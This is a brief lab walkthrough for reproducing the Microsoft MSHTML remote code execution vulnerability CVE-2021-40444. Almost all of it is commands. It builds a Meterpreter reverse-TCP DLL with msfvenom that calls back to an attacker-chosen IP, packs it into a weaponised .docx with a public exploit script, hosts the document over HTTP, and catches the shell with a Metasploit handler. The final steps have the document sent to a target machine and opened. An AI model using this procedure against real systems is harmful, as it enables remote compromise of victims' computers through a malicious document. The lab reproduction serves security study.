An attempt to reproduce Microsoft MSHTML Remote Code Execution (RCE) Vulnerability using Metasploit Framework.
works best if not run in FlareVM
Git Clone the repository from https://github.com/lockedbyte/CVE-2021-40444
Prepare the .dll template to be used later with msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll
Copy the recently produced template.dll into the folder test/ from the repository
Give executable permission to the template.dll by chmod +x template.dll
Run the script to use the template.dll to be process into output
python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>
The document will then be exported into the folder out/ and we can make a listener in our HTTP Port (Default is 80)
python3 exploit.py host 80
Run metasploit with
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <SOURCE IP>
run
Then we can send the document.docx to our vulnerable machine and execute the .docx
We will get response in the exploit.py terminal and also the lab is successful if we are able to spawn reverse tcp shell.